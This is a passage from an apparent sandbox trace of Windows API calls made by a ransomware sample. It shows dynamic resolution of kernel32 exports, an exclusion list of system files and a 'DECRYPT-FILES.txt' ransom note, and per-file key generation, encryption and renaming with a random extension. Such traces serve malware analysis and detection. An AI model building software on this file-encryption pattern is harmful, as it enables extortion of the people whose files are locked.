lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.714] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.714] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.714] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.714] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.714] lstrlenA (lpString="DELETEATOM") returned 10 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.714] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.714] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.714] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.714] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.714] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.714] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.714] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.714] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.714] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.714] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.714] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.714] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.714] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.714] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.715] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.715] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.715] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.715] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.715] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.715] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.715] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.715] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.715] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.715] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.715] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.715] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.715] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.715] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.715] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.715] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.716] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.716] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.716] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.716] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.716] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.716] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.716] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.716] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.716] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.716] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.716] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.716] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\z2fHcKc4CW0Oah1eKV.avi") returned 76 [0087.716] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\z2fHcKc4CW0Oah1eKV.avi.m1BRw0") returned 83 [0087.716] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\z2fHcKc4CW0Oah1eKV.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\z2fhckc4cw0oah1ekv.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\z2fHcKc4CW0Oah1eKV.avi.m1BRw0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\z2fhckc4cw0oah1ekv.avi.m1brw0"), dwFlags=0x0) returned 1 [0087.717] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.717] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.717] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.718] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc38b05f0, ftCreationTime.dwHighDateTime=0x1d4c83f, ftLastAccessTime.dwLowDateTime=0x754d4670, ftLastAccessTime.dwHighDateTime=0x1d4c98c, ftLastWriteTime.dwLowDateTime=0x754d4670, ftLastWriteTime.dwHighDateTime=0x1d4c98c, nFileSizeHigh=0x0, nFileSizeLow=0xa1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="_vYz 3tjCOF gW2pru4f.mkv", cAlternateFileName="_VYZ3T~1.MKV")) returned 1 [0087.718] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv", lpString2="DECRYPT-FILES.txt") returned -1 [0087.718] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv", lpString2="autorun.inf") returned -1 [0087.718] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv", lpString2="boot.ini") returned -1 [0087.718] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv", lpString2="desktop.ini") returned -1 [0087.718] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv", lpString2="ntuser.dat") returned -1 [0087.718] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv", lpString2="iconcache.db") returned -1 [0087.718] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv", lpString2="bootsect.bak") returned -1 [0087.718] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv", lpString2="ntuser.dat.log") returned -1 [0087.718] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv", lpString2="thumbs.db") returned -1 [0087.718] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv", lpString2="Bootfont.bin") returned -1 [0087.718] lstrlenW (lpString="_vYz 3tjCOF gW2pru4f.mkv") returned 24 [0087.718] lstrcmpiW (lpString1="mkv", lpString2="lnk") returned 1 [0087.718] lstrcmpiW (lpString1="mkv", lpString2="exe") returned 1 [0087.718] lstrcmpiW (lpString1="mkv", lpString2="sys") returned -1 [0087.718] lstrcmpiW (lpString1="mkv", lpString2="dll") returned 1 [0087.718] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.718] lstrlenW (lpString="_vYz 3tjCOF gW2pru4f.mkv") returned 24 [0087.718] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.718] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="_vYz 3tjCOF gW2pru4f.mkv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\_vYz 3tjCOF gW2pru4f.mkv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\_vYz 3tjCOF gW2pru4f.mkv" [0087.718] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\_vYz 3tjCOF gW2pru4f.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\_vyz 3tjcof gw2pru4f.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.719] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=41380) returned 1 [0087.719] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.719] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.719] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.719] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.719] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.719] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.719] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.720] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.720] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.721] CloseHandle (hObject=0x42c) returned 1 [0087.721] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.721] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.722] CloseHandle (hObject=0x0) returned 0 [0087.722] CloseHandle (hObject=0x428) returned 1 [0087.722] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.722] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.722] GetTickCount () returned 0x114e5fc [0087.722] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.723] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.723] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.723] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.723] lstrlenA (lpString="kernel32.dll") returned 12 [0087.723] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.723] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.723] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.723] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.724] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.724] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.724] lstrlenA (lpString="ADDATOMA") returned 8 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.724] lstrlenA (lpString="ADDATOMW") returned 8 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.724] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.724] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.724] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.724] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.724] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.724] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.724] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.724] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.724] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.724] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.724] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.724] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.724] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.724] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.724] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.724] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.725] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.725] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.725] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.725] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.725] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.725] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.725] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.725] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.725] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.725] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.725] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.725] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.725] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.725] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.725] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.725] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.725] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.725] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.725] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.726] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") 